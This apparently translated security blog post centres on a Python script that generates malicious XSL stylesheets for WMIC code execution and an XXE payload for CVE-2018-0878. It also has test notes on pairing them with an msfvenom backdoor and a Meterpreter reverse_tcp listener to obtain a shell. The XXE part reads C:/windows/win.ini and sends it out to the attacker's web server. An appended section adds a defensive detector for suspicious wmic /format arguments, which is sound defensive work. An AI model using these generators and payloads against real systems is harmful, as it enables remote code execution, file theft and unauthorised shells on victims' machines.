0x00 Preface
Today I (Demon) loaded up the RSS feeds a friend shared with me, and one of the articles was by Miyoshi students:
After reading the article carefully I learned some of the tricks behind this technique, so I wrote the following script.
0x001 Code
import optparse
import os
import socket


def main():
    parser = optparse.OptionParser()
    parser.add_option('-b', dest='local', action='store_true', help='Generate local XSL')
    parser.add_option('-y', dest='long', action='store_true', help='Generate remote XSL')
    parser.add_option('-j', dest='cve', action='store_true', help='Conduct CVE-2018-0878')
    (options, args) = parser.parse_args()
    if options.local:
        local()
    elif options.long:
        long()
    elif options.cve:
        cve()
    else:
        parser.print_help()
        exit()


def local():
    # Microsoft's own csv.xsl with an msxsl:script block added; the JScript runs
    # when WMIC applies the stylesheet (here it only launches calc.exe).
    with open('poc.xsl', 'w') as l:
        l.write(r"""<?xml version="1.0"?>
<!-- Copyright (c) Microsoft Corporation. All rights reserved. -->
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:my-scripts">
<xsl:output encoding="utf-16" omit-xml-declaration="yes"/>
<xsl:param name="norefcomma"/>
<msxsl:script language="JScript" implements-prefix="user">
function myFunction() { var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); return ""; }
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:myFunction()"/>
Node,<xsl:for-each select="COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY|COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY.ARRAY|COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY.REFERENCE"><xsl:value-of select="@NAME"/><xsl:if test="position()!=last()">,</xsl:if></xsl:for-each>
<xsl:apply-templates select="COMMAND/RESULTS"/>
</xsl:template>
<xsl:template match="RESULTS" xml:space="preserve"><xsl:apply-templates select="CIM/INSTANCE"/></xsl:template>
<xsl:template match="VALUE.ARRAY" xml:space="preserve">{<xsl:for-each select="VALUE"><xsl:apply-templates select="."/><xsl:if test="position()!=last()">;</xsl:if></xsl:for-each>}</xsl:template>
<xsl:template match="VALUE" xml:space="preserve"><xsl:value-of select="."/></xsl:template>
<xsl:template match="INSTANCE" xml:space="preserve"><xsl:value-of select="./../@NODE"/>,<xsl:for-each select="PROPERTY|PROPERTY.ARRAY|PROPERTY.REFERENCE"><xsl:apply-templates select="."/><xsl:if test="position()!=last()">,</xsl:if></xsl:for-each></xsl:template>
<xsl:template match="PROPERTY.REFERENCE" xml:space="preserve"><xsl:apply-templates select="VALUE.REFERENCE"></xsl:apply-templates></xsl:template>
<xsl:template match="PROPERTY"><xsl:apply-templates select="VALUE"/></xsl:template>
<xsl:template match="PROPERTY.ARRAY"><xsl:for-each select="VALUE.ARRAY"><xsl:apply-templates select="."/></xsl:for-each></xsl:template>
<xsl:template match="VALUE.REFERENCE">"<xsl:apply-templates select="INSTANCEPATH/NAMESPACEPATH"/><xsl:apply-templates select="INSTANCEPATH/INSTANCENAME|INSTANCENAME"/>"</xsl:template>
<xsl:template match="NAMESPACEPATH">\\<xsl:value-of select="HOST/text()"/><xsl:for-each select="LOCALNAMESPACEPATH/NAMESPACE">\<xsl:value-of select="@NAME"/></xsl:for-each>:</xsl:template>
<xsl:template match="INSTANCENAME"><xsl:value-of select="@CLASSNAME"/><xsl:for-each select="KEYBINDING"><xsl:if test="position()=1">.</xsl:if><xsl:value-of select="@NAME"/>="<xsl:value-of select="KEYVALUE/text()"/>"<xsl:if test="position()!=last()"></xsl:if><xsl:if test="not($norefcomma='true')">,</xsl:if><xsl:if test="$norefcomma='true'"><xsl:text> </xsl:text></xsl:if></xsl:for-each></xsl:template>
</xsl:stylesheet>
""")
    print('[*] Generation completed')
    print('[*] To get Meterpreter back: create the backdoor, put it on the target computer, and use modify.py to change the program executed in the XSL')
    print('[*] Enter the directory where poc.xsl is stored and execute on the target computer: wmic os get /format:poc')


def long():
    # Minimal stylesheet meant to be fetched over HTTP; the JScript runs when WMIC applies it.
    with open('longpoc.xsl', 'w') as g:
        g.write("""<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</ms:script>
</stylesheet>
""")
    print('[*] Generation completed')
    os.system('mv longpoc.xsl /var/www/html')
    print('[*] longpoc.xsl was moved to the /var/www/html directory')
    print('[*] Modify the program executed in the XSL with modify.py')
    print('[*] Put the generated backdoor on the target computer')
    print('[*] Start the Apache service')
    print('[*] wmic os get /format:"http://IP/longpoc.xsl"')


def cve():
    print('[@] Vulnerability introduction: https://www.exploit-db.com/exploits/44352/')
    # Find the local IP that routes outwards (connecting a UDP socket sends nothing)
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.connect(('8.8.8.8', 80))
    ip = s.getsockname()[0]
    s.close()
    ml = 'python -m SimpleHTTPServer 8080'
    # External DTD: reads win.ini and declares an out-of-band entity that sends it back
    with open('xxe.xml', 'w') as c:
        c.write("""<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://{}/?%payload;'>">
""".format(ip))
    os.system('mv xxe.xml /var/www/html')  # the test notes below move xxe.xml here
    # The XSL handed to wmic /format: pulls in the external DTD (CVE-2018-0878)
    with open('payload.xsl', 'w') as p:
        p.write("""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ZSL [
<!ENTITY % remote SYSTEM "http://{}:8080/xxe.xml">
%remote;
%root;
%oob;
]>
""".format(ip))
    print('[*] Got the local IP: {}'.format(ip))
    print('[*] Creating an HTTP server')
    print('[*] xxe.xml has been created')
    print('[*] and moved to /var/www/html')
    print('[*] payload.xsl has been created; move it to the target computer and execute the command: wmic os get /format:payload.xsl')
    os.system(ml)


if __name__ == '__main__':
    main()
Test result: -b
Attacker machine: Ubuntu
Victim: Windows Server R2
The generated XSL, and the XSL after modification:
shell.exe generated by msfvenom:
On Windows Server R2, open cmd, change into the directory where shell.exe is located and run: WMIC OS GET /FORMAT:SD
Start the listener on Ubuntu:
use exploit/multi/
192.168.223.133
4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
Test result: -j (CVE-2018-0878)
Vulnerability details: https://www.exploit-db.com/exploits/44352/
xxe.xml and payload.xsl are generated:
xxe.xml is moved to /var/www/html.
payload.xsl is copied onto the victim, Windows Server R2.
xxe.xml:
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://192.168.223.133/?%payload;'>">
payload.xsl:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ZSL [
<!ENTITY % remote SYSTEM "http://192.168.223.133:8080/xxe.xml">
%remote;
%root;
%oob;
]>
Start the Apache service:
service apache2 start
Execute on Windows Server R2:
wmic os get /format:payload.xsl
The WMIC command itself fails, but the vulnerability is triggered successfully.
Finally, the -b output served remotely; the steps match the two tests above, so I will not repeat them in detail:
1. Modify the program executed by the generated poc.xsl on the target machine, and move the XSL into the apache2 web root
2. Start apache2
3. Drop the generated backdoor onto the target machine
4. Execute wmic os get /format:"http://192.168.223.133/poc.xsl"
At this point WMIC requests the XSL and executes it. If your listener is already running, you get a shell.
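As an added defensive counterpart to the three flows above (not part of the original post or its script), a small Python triage routine that flags wmic invocations whose /format: argument is not one of WMIC's built-in output formats, covering the bare name (/FORMAT:SD), the local .xsl file and the http URL forms the post uses. The whitelist of built-in format names, the regexes and the Sysmon-style log records are constructed for this example.

```python
import re

# Output formats WMIC ships as stylesheets in %windir%\System32\wbem (assumed
# whitelist for this example, not taken from the original post). Any other
# /format: value makes WMIC load and execute a stylesheet the caller chose.
BUILTIN_FORMATS = {
    "list", "table", "value", "csv", "hform", "htable", "htable-sortby", "mof",
    "rawxml", "texttable", "texttablewsys", "textvaluelist", "xml",
}

# wmic or wmic.exe as the first token, optionally quoted and/or with a full path
WMIC_RE = re.compile(r'^\s*"?(?:[a-z]:\\[^"\s]*\\)?wmic(?:\.exe)?"?(?=\s|$)', re.I)
FORMAT_RE = re.compile(r'/format(?::(?P<value>"[^"]*"|\S*))?', re.I)

def format_values(cmdline):
    """Lower-cased, unquoted /format: values from a wmic command line; None if not wmic."""
    if not WMIC_RE.match(cmdline):
        return None
    return [(m.group('value') or '').strip('"').lower() for m in FORMAT_RE.finditer(cmdline)]

def suspicious_format(value):
    """Why a /format value is suspicious, or None for an empty or built-in format."""
    base = value.split(':', 1)[0]  # drop a parameter such as htable:"sortby=name"
    if not value or base in BUILTIN_FORMATS:
        return None
    if re.match(r'^(https?|ftp)://', value):
        return 'remote stylesheet fetched over ' + base   # the post's URL flow
    if value.endswith('.xsl') or '\\' in value or '/' in value:
        return 'stylesheet loaded from a file path'         # the -b and -j flows
    # A bare name that is not built in is resolved to <name>.xsl in the current directory
    return 'non built-in format name resolved to a local .xsl'

def scan(log_lines):
    """Return (command line, format value, reason) for every suspicious wmic /format use."""
    alerts = []
    for line in log_lines:
        cmd = line.split('CommandLine=', 1)[-1].strip()
        for value in format_values(cmd) or []:
            reason = suspicious_format(value)
            if reason:
                alerts.append((cmd, value, reason))
    return alerts

# Constructed Sysmon-style process creation records mirroring the commands in the post.
SAMPLE_LOG = [
    'EventID=1 Image=C:\\Windows\\System32\\wbem\\WMIC.exe CommandLine=wmic os get /format:csv',
    'EventID=1 Image=C:\\Windows\\System32\\wbem\\WMIC.exe CommandLine=wmic os get /format:payload.xsl',
    'EventID=1 Image=C:\\Windows\\System32\\wbem\\WMIC.exe CommandLine=WMIC OS GET /FORMAT:SD',
    'EventID=1 Image=C:\\Windows\\System32\\wbem\\WMIC.exe CommandLine=wmic os get /format:"http://192.168.223.133/poc.xsl"',
    'EventID=1 Image=C:\\Windows\\System32\\cmd.exe CommandLine=cmd /c dir /format:x',
]
```

Running scan(SAMPLE_LOG) flags the last three wmic records and leaves the built-in csv format and the non-wmic command alone.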
Building an XSL generator in Python